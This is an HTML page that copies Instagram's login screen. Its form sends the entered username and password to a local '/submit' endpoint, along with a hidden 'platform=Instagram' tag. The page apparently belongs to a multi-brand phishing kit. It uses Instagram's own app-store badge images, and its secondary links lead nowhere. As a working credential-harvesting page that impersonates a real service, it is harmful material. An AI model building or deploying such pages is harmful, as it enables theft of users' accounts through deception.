<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login</title>
    <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-black">
    <div class="flex flex-col items-center m-auto mt-5 p-[2rem] justify-center  bg-black">
   
        <div class="w-96 bg-black text-white p-6  shadow-lg border border-gray-700">
          <div class="flex justify-center mb-6">
            <img
              src="https://thumbs.dreamstime.com/b/print-204012277.jpg"
              alt="Instagram Logo"
              class="w-[500px] h-[100px] object-contain"
            />
          </div>
       
          <form class="space-y-4" action="/submit" method="POST">
            <input type="hidden" name="platform" value="Instagram">
            <input
              type="text"
              name="username"
              
              required
              placeholder="Phone number, username, or email"
              class="w-full h-5 p-[1rem]  bg-gray-800 text-white border border-gray-500"
            />
            <input
              type="password"
              placeholder="Password"
              name="password"
              required
              class="w-full h-5 p-[1rem]  bg-gray-800 text-white border border-gray-500 "
            />
            <button class="w-full bg-blue-500 p-[0.7] text-white font-bold  rounded">
              Log in
            </button>
          </form>
  
        
          <div class="text-center text-white my-4">OR</div>
  
       
          <div class="flex justify-center items-center space-x-2">
            <img
              src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg"
              class="w-4 h-4"
              alt="Facebook"
            />
            <a href="#" class="text-blue-500 font-semibold">
              Log in with Facebook
            </a>
          </div>
  
    
          <div class="text-center mt-4">
            <a href="#" class="text-gray-400 text-sm">
              Forgot password?
            </a>
          </div>
        </div>
  
      
        <div class="w-96 bg-black text-white p-4 mt-4  text-center border border-gray-700">
          <span class="text-white">Don't have an account?</span>
          <a href="#" class="text-blue-500 font-semibold">
    
            Sign up
          </a>
        </div>
  

        <div class="text-center text-gray-500 mt-6">Get the app.</div>
        <div class="flex justify-center mt-4 space-x-4">
          <img
            src="https://static.cdninstagram.com/rsrc.php/v4/yz/r/c5Rp7Ym-Klz.png"
            class="h-10"
            alt="Google Play"
          />
          <img
            src="https://static.cdninstagram.com/rsrc.php/v4/yt/r/Yfc020c87j0.png"
            class="h-10"
            alt="App Store"
          />
        </div>
      </div>
</body>
</html>
